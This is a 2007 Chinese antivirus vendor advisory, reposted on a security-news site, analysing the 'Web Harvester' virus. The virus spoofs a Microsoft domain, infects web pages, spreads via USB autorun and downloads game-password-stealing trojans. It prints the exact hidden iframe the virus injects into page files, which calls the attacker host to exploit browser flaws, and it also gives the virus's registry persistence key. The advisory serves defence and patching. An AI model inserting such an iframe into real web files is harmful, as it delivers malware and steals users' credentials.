热门关键字:  2007  下载  web  Windows XP  Windows+XP
当前位置 :| 首页 >>安全预警 >>Windows漏洞 >>

假冒微软网站疯狂传播网页收割者技术报告

来源:江民科技 作者: 时间:2007-09-21 点击:

  2007年9月20日,江民科技反病毒中心截获一个通过假冒微软网站进行传播的病毒——“网页收割者”(Virus.Autorun.dr),该病毒会感染网页文件,向其中插入恶意网址链接,同时病毒会利用多个系统漏洞下载恶性网游木马,威胁游戏玩家帐号密码安全。

  江民反病毒专家介绍,“网页收割者”病毒会假冒微软网址http://mlcro-soft.cn/***.htm,一旦用户点击了该假冒网站或是点击了被病毒感染的网页时,系统中存在漏洞的用户就会被病毒入侵。病毒会利用多个系统漏洞下载20多个恶性网游木马,盗取游戏玩家的帐号和密码,给玩家带来极大的损失。值得注意的是,该病毒也可以通过U盘进行传播。

  截至目前,江民反病毒中心已经接到上百名用户对于该病毒的求助电话,病毒疫情紧急。针对该病毒,江民科技已紧急升级病毒库,用户只需将江民杀毒软件升级到9月20日病毒库,打开杀毒软件的全部监控,即可有效防杀该病毒。没有安装杀毒软件的用户,可以下载安装30天免费的江民杀毒软件KV2008进行病毒防杀,下载地址:  
  http://www.jiangmin.com/zhuanti/kv2008/index.htm

该病毒会感染网页文件,向其中插入恶意网址连接,并利用多个系统漏洞下载20多个恶性网游木马,盗取游戏玩家的帐号和密码,给玩家带来极大的损失。详细的技术分析如下:

病毒名称:Virus.Autorun.dr
中 文 名:网页收割者
病毒类型:木马
危害等级:★★★
影响平台:Win 9X/ME/NT/2000/XP/2003

1. Virus.Autorun.dr  网页收割者病毒采用Delphi 工具编写,病毒运行后,会创建病毒进程:crsss.exe,该进程指向的路径为:%WinDir%\System32\crsss.exe,文件大小为 62512字节。

该病毒在注册表中添加下列启动项:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"crsss" = %WinDir%\system32\crsss.exe
这样,在Windows启动时,病毒就可以自动执行。

2. 该病毒还会搜索硬盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<IfrAmE src=http://mlcro-soft.cn/update.htm width=0 height=0></IfrAmE>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行20多个恶性网游木马,盗取游戏玩家的帐号和密码,给玩家带来极大的损失。



图: 被“网页收割者”病毒感染后的网页文件内部被插入了恶意网址连接




该病毒还会生成下载网游木马列表文件:%WinDir%\system32\c.txt ,病毒会将这些网游木马下载并且执行,从而盗取游戏玩家的帐号和密码,给玩家带来极大的损失。

3. 病毒还会通过U盘/MP3/移动硬盘的移动存储设备进行传播,在其中生成autorun.inf和niu.exe两个病毒文件,这样当用户在双击打开U盘的时候就会将病毒激活,从而感染到系统中。
4. 该病毒还会强行修改IE首页,将首页设置为http://mlcro-soft.cn/update.htm 带毒网站,这样用户一打开IE浏览器就会感染病毒。该病毒还会破坏操作系统的注册表相关键值,使系统无法显示隐藏文件。
江民科技针对“网页收割者”病毒的解决方案:

1. 请将KV系列杀毒软件的病毒库升级到9月20日,并开启所有的实时监功能,即可拦截此病毒。

2. 建议用户通过Windows系统的Windows Update功能更新操作系统补丁,尤其是一定要打上MS06-014漏洞,MS07-017漏洞,MS07-004漏洞等网页木马多用漏洞。

MS06-014补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx

MS07-017补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx

MS07-004补丁下载网址:
http://www.microsoft.com/china/technet/security/bulletin/MS07-004.mspx

3. 禁用系统的自动播放功能,防止病毒从U盘、MP3、移动硬盘等移动存储设备进入到计算机。
禁用Windows系统的自动播放功能的方法:在运行中输入 gpedit.msc后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。
建议选择具有U盘病毒免疫功能的杀毒软件如:KV2008杀毒软件。

4. 不要随意接收从QQ、MSN等即时聊天工具发送过来的可执行文件,不要登陆来历不明的网址连接。

5. 江民杀毒软件 KV2007和KV2008都具有U盘病毒免疫功能,可以有效预防此类病毒。


[社区] [评论] [打印] [关闭]
上一篇:雅虎Messenger曝出今年第9个安全漏洞   下一篇:InfoWorld年度最佳开源软件尘埃落定
栏目列表
热点关注
图片文章
赞助商链接

版权所有 西部网安 Copyright(C) 2005-2008 All Rights Reserved.